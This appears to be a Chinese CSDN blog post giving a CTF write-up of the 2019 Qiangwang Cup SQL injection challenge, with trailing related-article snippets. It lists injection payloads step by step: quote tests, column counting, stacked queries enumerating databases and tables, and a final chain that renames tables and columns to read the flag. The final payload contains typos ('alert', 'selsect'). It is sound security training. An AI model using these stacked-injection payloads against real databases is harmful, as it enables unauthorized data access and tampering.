SQL注入学习

最新推荐文章于 2021-04-19 10:28:13 发布
最新推荐文章于 2021-04-19 10:28:13 发布
阅读量510 收藏 1
点赞数 1
分类专栏: CTF-WEB 文章标签: sql注入 web安全 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qin9800/article/details/105299457
版权

[强网杯 2019] 随便注

每天学习网络安全知识,本文记录强网杯的一个SQL注入题。

 

 

使用单引号测试,发现页面报错,说明此处存在SQL注入漏洞。

 

 

1'
1''

 

既然此处存在漏洞,那么我们就走正常流程测试下,如果不知道SQL注入正常流程的可以取看下我的sqllibs注入教程。

1.猜字段数

 

1' order by 3#
1' order by 2#

 

 

使用第一个payload测试的时候发现页面报错,再使用第二个payload时发现页面显示正常,因此我们可以得知当前数据库当前表存在2个字段。
这时候尝试union select进行联合查询。

2.使用联合查询

 

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

发现页面提示过滤了许多关键的命令,看来需要一些骚操作了。

3.尝试堆叠注入

 

1';show databases#

 

发现成功爆出所有数据库。
使用show tables;试试看看能不能得到表名

 

-1';show tables#

 

成功爆出当前数据库的两个表名;尝试查询表中的字段

 

0';show columns from `1919810931114514`;#

 

发现有一个flag字段,接下来就是尝试读取flag。

4. 再查看words表的结构

 

0';desc words;#

 

可以猜测我们提交查询的窗口就是在这个表里查询数据的。

5. 那么查询语句很有可能是 : selsect id,data from words where id =

然后1919810931114514只有一个flag字段
这时候虽然有强大的正则过滤,但没有过滤alert和rename关键字
这时候我们就可以已下面的骚姿势进行注入:
1.将words表改名为word1或其它任意名字
2.1919810931114514改名为words
3.将新的word表插入一列,列名为id
4.将flag列改名为data

1';rename table `words` to `word1`;rename table `1919810931114514` to `words`;alter table `words` add id int unsigned not Null auto_increment primary key; alert table `words` change `flag` `data` varchar(100);#

成功拿到flag。

夏了茶糜
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQL注入原理(手动SQL注入)---web渗透学习
Packet_Lee的博客
04-08 616
上一文《SQL注入原理—Web渗透学习》主要罗列了SQL注入的危害、SQL注入的主要方式及SQL注入主要关注的数据库infromation_schema库。重点讲了infromation_schema数据库,其本质是保存着数据库服务器中所有数据库信息,主要包含了该服务器包括了哪些数据库(schemata表),各个数据库中都包含了那些表格(tables表—其中table_schema列保存数据库名称...
sql注入学习网站
weixin_30682415的博客
01-10 563
https://websec.ca/kb/sql_injection 转载于:https://www.cnblogs.com/heycomputer/articles/10249524.html
sql注入--------学习篇一
稻草人的高粱地
09-03 827
 下面是我的一点点经历,如果您对此不感兴趣可直接掠过看下一段:小弟不才,之前曾做过几个网站,因为网站不是很大本以为不用考虑太多网络安全问题,所以对网站的安全没做过多的考虑,谁知刚上线还 不 到一 个 月。。,就被YY黑客给光顾了,真TMD给面子啊! 既然问题来了就解决呗,进去网站刚打开网页KB就提示拦截了www.xxxxx.网站木马。。。⊙﹏⊙b汗   赶快看看源代码吧“查看”—》“源
sql注入漏洞学习
05-23
由于程序没有过滤用户的输入,攻击者通过响服务器提交恶意的SQL查询语句,应用程序接收后错误的将攻击者的输入作为原始SQL查询语句的一部分执行,导致改变了程序原始的SQL查询逻辑,额外的执行了攻击者构造的SQL查询语句
sql注入学习入门篇
12-16
SQL注入学习入门篇 SQL注入是一种常见的网络攻击手段,它能够让攻击者获取到网站的敏感信息,从而导致严重的安全隐患。随着B/S模式应用开发的发展,使用这种模式编写应用程序的程序员也越来越多。但是由于这个行业...
sql注入讲解ppt.pptx
08-10
SQL 注入基础知识点总结 SQL 注入是指 web 应用程序对用户...通过学习 SQL 注入基础知识、工具和环境搭建、MySQL 数据库基础知识、SQL 注入防御、SQL 注入类型和基本步骤,我们可以更好地理解和防御 SQL 注入攻击。
sql注入网站源码
04-09
这个"sql注入网站源码"提供了一个具有SQL注入漏洞的ASP(Active Server Pages)网站实例,对于学习如何检测、防范和修复这类漏洞非常有价值。ASP是微软开发的一种服务器端脚本语言,常用于构建动态网站。 在ASP中,...
sql注入学习进阶篇
12-16
本文主要针对SQL注入的进阶学习进行深入探讨。 在SQL注入的过程中,首要步骤是判断环境和注入点,识别数据库类型,这通常是通过尝试不同类型的注入语句来完成的。接下来,我们需要根据参数类型重构原始SQL语句。...
sql注入学习笔记
Linfosheng1的博客
01-23 471
工欲善其事必先利其器,首先就是要配置好环境 一、环境安装篇 1.1、SQLMap工具的简介: SQLMap是一个自动化的sql注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞,内置很多绕过插件,支持的数据库有MySQL、Oracle、PostgreSQL、Microsoft SQL Server、SQLite等数据库。SQLMap采用以下5种独特的SQL注入技术 基于布尔类型的...
学习sql注入漏洞网址的创建
06-06
学习sql注入,往往需要一个可注入的网址,这篇文章很好的解决了这个问题,我们可以自己创建一个自己用的地址来学习,可以让我们为所欲为。
sql注入学习高级篇
12-16
sql注入学习高级篇
SQL注入学习自测
Seizerz的博客
09-03 900
以下是我在学习整理面试题时所遇到的问题,方便自己巩固sql注入学习。 1、sql注入的原理 sql注入就是指web应用程序对用户输入数据的合法性没有判断,前端传入后端的参数是攻击者可控的,并且参数带入数据库查询,攻击者可以通过构造不同的sql语句来实现对数据库的任意操作。 2、sql注入的判断方式会几种(如何判断有sql注入) 单引号法 如果页面返回错误,则存在sql注入,因为无论是...
sql注入 练手网站_靶场sql注入练手----sqlmap篇(纯手打)
weixin_39561004的博客
01-30 267
靶场地址:封神台方法一、首先尝试手工找注入点判断第一步,判断是否存在sql注入漏洞构造 ?id=1 and 1=1 ,回车,页面返回正常构造 ?id=1 and 1=2 ,回车,页面不正常,初步判断这里 可能 存在一个注入漏洞第二步:判断字段数构造 ?id=1 and 1=1 order by 1 回车,页面正常构造 ?id=1 and 1=1 order by 2 回车,页面正常构造 ?id=1...
sql注入知识点汇总
baidu_38844729的博客
12-28 178
类型 union联合查询注入 布尔盲注 报错注入 时间盲注 堆叠查询注入 二次注入 宽字节注入 base64注入 cookie注入攻击-http请求头参数注入 常用函数 substr(),mid(),limit(),rand(),floor(),concat(),ascii() 常用报错函数 1、floor()函数 union select count(*),concat((查询语句),0x26,floor(rand(0)*2))x from information_schema.columns group
SQL注入学习详细过程
liwenqianye的博客
04-19 717
sql注入学习笔记一、union注入1.判断是否存在注入:2.加粗样式查询字段数量3.查询SQL语句插入位置4.获取数据库库名5.获取表名6.获取字段名7.获取数据union注入PHP代码二、Boolean注入mysql的几个内置函数:1.判断注入点2.判断数据库的长度3.获取数据库的名字4.获取表的总数5.获取第一个表的长度6.获取表的内容7.获取表的字段总数三、报错注入报错函数3.extractvalue()4.rand()+group()+count5.几何函数6.不存在的函数7.bigint数值操作
sql防注入代码
weixin_30539835的博客
08-27 72
function defend_sql($string, $force = 1) { $preg = "select|insert|and|or|update|delete|\'|\/\*|\*|\.\.\/|\.\/|union|into|load_file|outfile"; if(!get_magic_quotes_gpc() || $force) { ...
mysql 关键词绕过_关于SQL注入绕过的一些知识点
weixin_34698515的博客
01-19 349
一、绕过waf思路从第一步起,一点一点去分析,然后绕过。1、过滤 and,orpreg_match('/(and|or)/i', $id)Filtered injection: 1 or 1 = 1 1 and 1 = 1Bypassed injection: 1 || 1 = 1 1 && 1 = 12、过滤 and, or, unionpreg_match('/(and|or...
[强网杯 2019] web题-高明的黑客
BROTHERYY的博客
07-08 1004
复现环境:buuoj.cn 下载下来的源码很大,大到让人傻掉 看了下大佬的wp 是说找出这些源码中所有的GET和POST请求,模拟请求一遍,看看那个能RCE能够使用。 这里贴出赵师傅的Python脚本 膜一波 import os import threading from concurrent.futures.thread import ThreadPoolExecutor import requests session = requests.Session() path = "/Users/ji

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值